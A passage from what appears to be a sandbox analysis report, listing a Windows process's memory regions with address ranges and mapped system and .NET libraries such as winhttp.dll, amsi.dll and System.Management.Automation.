end_va = 0x7ffc14942fff entry_point = 0x7ffc14800000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 687 start_va = 0x7ffc123a0000 end_va = 0x7ffc12435fff entry_point = 0x7ffc123a0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 688 start_va = 0x233e3550000 end_va = 0x233e370ffff entry_point = 0x0 region_type = private name = "private_0x00000233e3550000" filename = "" Region: id = 689 start_va = 0x7ffc16810000 end_va = 0x7ffc16969fff entry_point = 0x7ffc16810000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 690 start_va = 0x233e1200000 end_va = 0x233e1200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1200000" filename = "" Region: id = 691 start_va = 0x233e1960000 end_va = 0x233e1a1bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1960000" filename = "" Region: id = 692 start_va = 0x233e1200000 end_va = 0x233e1203fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1200000" filename = "" Region: id = 693 start_va = 0x7ffc119f0000 end_va = 0x7ffc11a11fff entry_point = 0x7ffc119f0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 694 start_va = 0x233e3550000 end_va = 0x233e362cfff entry_point = 0x233e3550000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 695 start_va = 0x233e3700000 end_va = 0x233e370ffff entry_point = 0x0 region_type = private name = "private_0x00000233e3700000" filename = "" Region: id = 696 start_va = 0x3500300000 end_va = 0x350037ffff entry_point = 0x0 region_type = private name = "private_0x0000003500300000" filename = "" Region: id = 697 start_va = 0x3500380000 end_va = 0x35003fffff entry_point = 0x0 region_type = private name = "private_0x0000003500380000" filename = "" Region: id = 698 start_va = 0x3500400000 end_va = 0x350047ffff entry_point = 0x0 region_type = private name = "private_0x0000003500400000" filename = "" Region: id = 699 start_va = 0x3500480000 end_va = 0x35004fffff entry_point = 0x0 region_type = private name = "private_0x0000003500480000" filename = "" Region: id = 700 start_va = 0x7ffbf77c0000 end_va = 0x7ffbf77d2fff entry_point = 0x7ffbf77c0000 region_type = mapped_file name = "msoxmlmf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll") Region: id = 701 start_va = 0x7ffc05ea0000 end_va = 0x7ffc05eb5fff entry_point = 0x7ffc05ea0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 702 start_va = 0x7ffc12bc0000 end_va = 0x7ffc12cb3fff entry_point = 0x7ffc12bc0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 703 start_va = 0x233e1310000 end_va = 0x233e1310fff entry_point = 0x0 region_type = private name = "private_0x00000233e1310000" filename = "" Region: id = 704 start_va = 0x233e1320000 end_va = 0x233e1320fff entry_point = 0x0 region_type = private name = "private_0x00000233e1320000" filename = "" Region: id = 705 start_va = 0x233e3550000 end_va = 0x233e364ffff entry_point = 0x0 region_type = private name = "private_0x00000233e3550000" filename = "" Region: id = 706 start_va = 0x7ffc06410000 end_va = 0x7ffc06423fff entry_point = 0x7ffc06410000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1333 start_va = 0x7ffc06430000 end_va = 0x7ffc06525fff entry_point = 0x7ffc06430000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1334 start_va = 0x233e1330000 end_va = 0x233e134ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1330000" filename = "" Region: id = 1335 start_va = 0x233e1330000 end_va = 0x233e134ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1330000" filename = "" Region: id = 1336 start_va = 0x233e3710000 end_va = 0x233e380ffff entry_point = 0x0 region_type = private name = "private_0x00000233e3710000" filename = "" Region: id = 1337 start_va = 0x7ffc063e0000 end_va = 0x7ffc06404fff entry_point = 0x7ffc063e0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1338 start_va = 0x7ffbf7780000 end_va = 0x7ffbf779bfff entry_point = 0x7ffbf7780000 region_type = mapped_file name = "wmi2xml.dll" filename = "\\Windows\\System32\\wbem\\xml\\wmi2xml.dll" (normalized: "c:\\windows\\system32\\wbem\\xml\\wmi2xml.dll") Region: id = 1339 start_va = 0x233e3810000 end_va = 0x233e390ffff entry_point = 0x0 region_type = private name = "private_0x00000233e3810000" filename = "" Region: id = 1340 start_va = 0x7ffc14a70000 end_va = 0x7ffc15fcefff entry_point = 0x7ffc14a70000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1341 start_va = 0x233e1330000 end_va = 0x233e1330fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1330000" filename = "" Region: id = 1342 start_va = 0x233e1340000 end_va = 0x233e1340fff entry_point = 0x233e1340000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 1343 start_va = 0x7ffc0b3b0000 end_va = 0x7ffc0b3c4fff entry_point = 0x7ffc0b3b0000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 1344 start_va = 0x7ffc0f200000 end_va = 0x7ffc0f2c7fff entry_point = 0x7ffc0f200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1345 start_va = 0x233e1350000 end_va = 0x233e1350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1350000" filename = "" Region: id = 1346 start_va = 0x7ffc16fa0000 end_va = 0x7ffc16fa7fff entry_point = 0x7ffc16fa0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1347 start_va = 0x7ffc12490000 end_va = 0x7ffc12539fff entry_point = 0x7ffc12490000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1348 start_va = 0x7ffc132f0000 end_va = 0x7ffc1334bfff entry_point = 0x7ffc132f0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1349 start_va = 0x7ffc0c430000 end_va = 0x7ffc0c43afff entry_point = 0x7ffc0c430000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1350 start_va = 0x233e1360000 end_va = 0x233e136ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1360000" filename = "" Region: id = 1351 start_va = 0x233e3910000 end_va = 0x233e3a0ffff entry_point = 0x0 region_type = private name = "private_0x00000233e3910000" filename = "" Region: id = 1352 start_va = 0x7ffc0ad10000 end_va = 0x7ffc0ad19fff entry_point = 0x7ffc0ad10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1353 start_va = 0x7ffc0c360000 end_va = 0x7ffc0c3c6fff entry_point = 0x7ffc0c360000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1354 start_va = 0x233e3a10000 end_va = 0x233e3e0afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e3a10000" filename = "" Region: id = 1355 start_va = 0x7ffc12f70000 end_va = 0x7ffc12fe9fff entry_point = 0x7ffc12f70000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1356 start_va = 0x7ffc13a90000 end_va = 0x7ffc13a9ffff entry_point = 0x7ffc13a90000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1357 start_va = 0x7ffc142c0000 end_va = 0x7ffc14486fff entry_point = 0x7ffc142c0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1358 start_va = 0x233e1370000 end_va = 0x233e1371fff entry_point = 0x0 region_type = private name = "private_0x00000233e1370000" filename = "" Region: id = 1359 start_va = 0x7ffc03cc0000 end_va = 0x7ffc03cd3fff entry_point = 0x7ffc03cc0000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1360 start_va = 0x7ffc13550000 end_va = 0x7ffc13589fff entry_point = 0x7ffc13550000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1361 start_va = 0x7ffc13590000 end_va = 0x7ffc135b6fff entry_point = 0x7ffc13590000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1362 start_va = 0x7ffc13070000 end_va = 0x7ffc13079fff entry_point = 0x7ffc13070000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1363 start_va = 0x7ffc13bf0000 end_va = 0x7ffc13c44fff entry_point = 0x7ffc13bf0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1364 start_va = 0x7ffc133a0000 end_va = 0x7ffc133b6fff entry_point = 0x7ffc133a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1365 start_va = 0x7ffc13030000 end_va = 0x7ffc13063fff entry_point = 0x7ffc13030000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1376 start_va = 0x3500500000 end_va = 0x350057ffff entry_point = 0x0 region_type = private name = "private_0x0000003500500000" filename = "" Region: id = 1377 start_va = 0x7ffc03d40000 end_va = 0x7ffc03d5dfff entry_point = 0x7ffc03d40000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1378 start_va = 0x7ffc134c0000 end_va = 0x7ffc134cafff entry_point = 0x7ffc134c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1379 start_va = 0x233e1390000 end_va = 0x233e13a0fff entry_point = 0x233e1390000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 1380 start_va = 0x7ffc17330000 end_va = 0x7ffc1739efff entry_point = 0x7ffc17330000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1381 start_va = 0x7ffbf6140000 end_va = 0x7ffbf6207fff entry_point = 0x7ffbf6140000 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 1382 start_va = 0x7ffbf68c0000 end_va = 0x7ffbf68cffff entry_point = 0x7ffbf68c0000 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 1383 start_va = 0x7ffbf8ae0000 end_va = 0x7ffbf8b47fff entry_point = 0x7ffbf8ae0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 1384 start_va = 0x233e1370000 end_va = 0x233e1376fff entry_point = 0x0 region_type = private name = "private_0x00000233e1370000" filename = "" Region: id = 1385 start_va = 0x233e3f40000 end_va = 0x233e3f4ffff entry_point = 0x0 region_type = private name = "private_0x00000233e3f40000" filename = "" Region: id = 1386 start_va = 0x7ffbf8a40000 end_va = 0x7ffbf8ad7fff entry_point = 0x7ffbf8a40000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 1387 start_va = 0x7ffc08000000 end_va = 0x7ffc08009fff entry_point = 0x7ffc08000000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1388 start_va = 0x5cfe0000 end_va = 0x5d0a8fff entry_point = 0x5cfe0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_88e4514b2faac6c7\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_88e4514b2faac6c7\\msvcr80.dll") Region: id = 1389 start_va = 0x233e13b0000 end_va = 0x233e13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e13b0000" filename = "" Region: id = 1390 start_va = 0x233e13c0000 end_va = 0x233e13cffff entry_point = 0x0 region_type = private name = "private_0x00000233e13c0000" filename = "" Region: id = 1391 start_va = 0x7ffbf57a0000 end_va = 0x7ffbf613ffff entry_point = 0x7ffbf57a0000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll") Region: id = 1392 start_va = 0x233e13d0000 end_va = 0x233e13dffff entry_point = 0x0 region_type = private name = "private_0x00000233e13d0000" filename = "" Region: id = 1393 start_va = 0x233e13e0000 end_va = 0x233e13e6fff entry_point = 0x0 region_type = private name = "private_0x00000233e13e0000" filename = "" Region: id = 1394 start_va = 0x20000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1395 start_va = 0x233e13f0000 end_va = 0x233e13f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e13f0000" filename = "" Region: id = 1396 start_va = 0x233e1400000 end_va = 0x233e1400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1400000" filename = "" Region: id = 1397 start_va = 0x3500580000 end_va = 0x35005fffff entry_point = 0x0 region_type = private name = "private_0x0000003500580000" filename = "" Region: id = 1398 start_va = 0x7ffb96030000 end_va = 0x7ffb9603ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96030000" filename = "" Region: id = 1399 start_va = 0x7ffb96040000 end_va = 0x7ffb9604ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96040000" filename = "" Region: id = 1400 start_va = 0x7ffb96050000 end_va = 0x7ffb960effff entry_point = 0x0 region_type = private name = "private_0x00007ffb96050000" filename = "" Region: id = 1401 start_va = 0x7ffb960f0000 end_va = 0x7ffb960fffff entry_point = 0x0 region_type = private name = "private_0x00007ffb960f0000" filename = "" Region: id = 1402 start_va = 0x7ffb96100000 end_va = 0x7ffb9616ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96100000" filename = "" Region: id = 1403 start_va = 0x3500600000 end_va = 0x350067ffff entry_point = 0x0 region_type = private name = "private_0x0000003500600000" filename = "" Region: id = 1404 start_va = 0x233e3e10000 end_va = 0x233e3f1afff entry_point = 0x0 region_type = private name = "private_0x00000233e3e10000" filename = "" Region: id = 1405 start_va = 0x233e3f50000 end_va = 0x233fbf4ffff entry_point = 0x0 region_type = private name = "private_0x00000233e3f50000" filename = "" Region: id = 1406 start_va = 0x233fbf50000 end_va = 0x233fc61ffff entry_point = 0x0 region_type = private name = "private_0x00000233fbf50000" filename = "" Region: id = 1407 start_va = 0x7ffbf48c0000 end_va = 0x7ffbf579dfff entry_point = 0x7ffbf48c0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\00976757a0c560c95932437bdc9d474f\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\00976757a0c560c95932437bdc9d474f\\mscorlib.ni.dll") Region: id = 1408 start_va = 0x233e1410000 end_va = 0x233e141ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1410000" filename = "" Region: id = 1409 start_va = 0x7ff66dda0000 end_va = 0x7ff66ddaffff entry_point = 0x0 region_type = private name = "private_0x00007ff66dda0000" filename = "" Region: id = 1410 start_va = 0x7ff66ddb0000 end_va = 0x7ff66de3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff66ddb0000" filename = "" Region: id = 1411 start_va = 0x7ffc138b0000 end_va = 0x7ffc13948fff entry_point = 0x7ffc138b0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1412 start_va = 0x233e1420000 end_va = 0x233e142ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1420000" filename = "" Region: id = 1413 start_va = 0x7ffb96170000 end_va = 0x7ffb9617ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96170000" filename = "" Region: id = 1414 start_va = 0x7ffbf37e0000 end_va = 0x7ffbf3e88fff entry_point = 0x7ffbf37e0000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\b9686994a3c564bc9709f37a974d0ab1\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\b9686994a3c564bc9709f37a974d0ab1\\system.xml.ni.dll") Region: id = 1415 start_va = 0x7ffbf3e90000 end_va = 0x7ffbf48bffff entry_point = 0x7ffbf3e90000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\21161602d61e696b127fa8412fba51a5\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\21161602d61e696b127fa8412fba51a5\\system.ni.dll") Region: id = 1416 start_va = 0x233e1430000 end_va = 0x233e1437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1430000" filename = "" Region: id = 1417 start_va = 0x233e1450000 end_va = 0x233e1450fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1450000" filename = "" Region: id = 1418 start_va = 0x7ffb96180000 end_va = 0x7ffb9618ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96180000" filename = "" Region: id = 1419 start_va = 0x7ffbf3650000 end_va = 0x7ffbf37d2fff entry_point = 0x7ffbf3650000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll") Region: id = 1420 start_va = 0x233e1460000 end_va = 0x233e146ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1460000" filename = "" Region: id = 1421 start_va = 0x233e1470000 end_va = 0x233e147ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1470000" filename = "" Region: id = 1422 start_va = 0x233e1480000 end_va = 0x233e148ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1480000" filename = "" Region: id = 1423 start_va = 0x233e1490000 end_va = 0x233e149ffff entry_point = 0x0 region_type = private name = "private_0x00000233e1490000" filename = "" Region: id = 1424 start_va = 0x7ffb96190000 end_va = 0x7ffb961cffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96190000" filename = "" Region: id = 1425 start_va = 0x233e14a0000 end_va = 0x233e14affff entry_point = 0x0 region_type = private name = "private_0x00000233e14a0000" filename = "" Region: id = 1426 start_va = 0x233e14b0000 end_va = 0x233e14bffff entry_point = 0x0 region_type = private name = "private_0x00000233e14b0000" filename = "" Region: id = 1427 start_va = 0x233e14c0000 end_va = 0x233e14cffff entry_point = 0x0 region_type = private name = "private_0x00000233e14c0000" filename = "" Region: id = 1428 start_va = 0x233e14e0000 end_va = 0x233e14effff entry_point = 0x0 region_type = private name = "private_0x00000233e14e0000" filename = "" Region: id = 1429 start_va = 0x7ffbf2af0000 end_va = 0x7ffbf364cfff entry_point = 0x7ffbf2af0000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\f39bedd1fb8c063e389d9599e994a7bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\f39bedd1fb8c063e389d9599e994a7bb\\system.management.automation.ni.dll") Region: id = 1430 start_va = 0x233e1920000 end_va = 0x233e1924fff entry_point = 0x233e1920000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 1431 start_va = 0x233e1930000 end_va = 0x233e1932fff entry_point = 0x233e1930000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 1432 start_va = 0x233e1940000 end_va = 0x233e1940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1940000" filename = "" Region: id = 1433 start_va = 0x233e3650000 end_va = 0x233e3690fff entry_point = 0x233e3650000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 1434 start_va = 0x7ffbf2ae0000 end_va = 0x7ffbf2ae9fff entry_point = 0x7ffbf2ae0000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll") Region: id = 1435 start_va = 0x233e36a0000 end_va = 0x233e36f3fff entry_point = 0x233e36a0000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll") Region: id = 1436 start_va = 0x7ffbf2980000 end_va = 0x7ffbf2aebfff entry_point = 0x7ffbf2980000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\0a275683c96e1bb1b30d0be9e7176315\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\0a275683c96e1bb1b30d0be9e7176315\\system.management.ni.dll") Region: id = 1437 start_va = 0x5ccd0000 end_va = 0x5cfdbfff entry_point = 0x5ccd0000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1438 start_va = 0x233e1940000 end_va = 0x233e1940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233e1940000" filename = "" Region: id = 1439 start_va = 0x7ffb961d0000 end_va = 0x7ffb961dffff entry_point = 0x0 region_type = private name = "private_0x00007ffb961d0000" filename = "" Region: id = 1440 start_va = 0x7ffb961e0000 end_va = 0x7ffb961effff entry_point = 0x0 region_type = private name = "private_0x00007ffb961e0000" filename = "" Region: id = 1441 start_va = 0x7ffb961f0000 end_va = 0x7ffb961fffff entry_point = 0x0 region_type = private name = "private_0x00007ffb961f0000" filename = "" Region: id = 1442 start_va = 0x7ffb96200000 end_va = 0x7ffb9620ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96200000" filename = "" Region: id = 1443 start_va = 0x7ffb96210000 end_va = 0x7ffb9621ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96210000" filename = "" Region: id = 1444 start_va = 0x7ffb96220000 end_va = 0x7ffb9622ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96220000" filename = "" Region: id = 1445 start_va = 0x7ffb96230000 end_va = 0x7ffb9623ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96230000" filename = "" Region: id = 1446 start_va = 0x7ffb96240000 end_va = 0x7ffb9624ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96240000" filename = "" Region: id = 1447 start_va = 0x7ffb96250000 end_va = 0x7ffb9625ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96250000" filename = "" Region: id = 1448 start_va = 0x7ffb96260000 end_va = 0x7ffb9626ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96260000" filename = "" Region: id = 1449 start_va = 0x7ffbf1bd0000 end_va = 0x7ffbf2428fff entry_point = 0x7ffbf1bd0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\6d7e9346540b54a87f6dc9d2c1e41fde\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\6d7e9346540b54a87f6dc9d2c1e41fde\\system.data.ni.dll") Region: id = 1450 start_va = 0x7ffbf27e0000 end_va = 0x7ffbf2973fff entry_point = 0x7ffbf27e0000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c9e715b348d50a8d998941274163be87\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c9e715b348d50a8d998941274163be87\\system.directoryservices.ni.dll") Region: id = 1451 start_va = 0x7ffb96270000 end_va = 0x7ffb9627ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96270000" filename = "" Region: id = 1452 start_va = 0x7ffb96280000 end_va = 0x7ffb9628ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96280000" filename = "" Region: id = 1453 start_va = 0x7ffb96290000 end_va = 0x7ffb9629ffff entry_point = 0x0 region_type = private name = "private_0x00007ffb96290000" filename = "" Region: id = 1454 start_va = 0x7ffb962a0000 end_va = 0x7ffb962affff entry_point = 0x0 region_type = private name = "private_0x00007ffb962a0000" filename = "" Region: id = 1455 start_va = 0x233e3f20000 end_va = 0x233e3f24fff entry_point = 0x233e3f20000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1456 start_va = 0x233e3f30000 end_va = 0x233e3f3ffff entry_point = 0x233e3f30000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1457 start_va = 0x5cc80000 end_va = 0x5ccc8fff entry_point = 0x5cc80000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 1458 start_va = 0x233fc620000 end_va = 0x233fc620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000233fc620000" filename = "" Region: id = 1459 start_va = 0x7ffbf1650000 end_va = 0x7ffbf1734fff entry_point = 0x7ffbf1650000 region_type = mapped_file name = "system.transactions.ni.dll" filename = 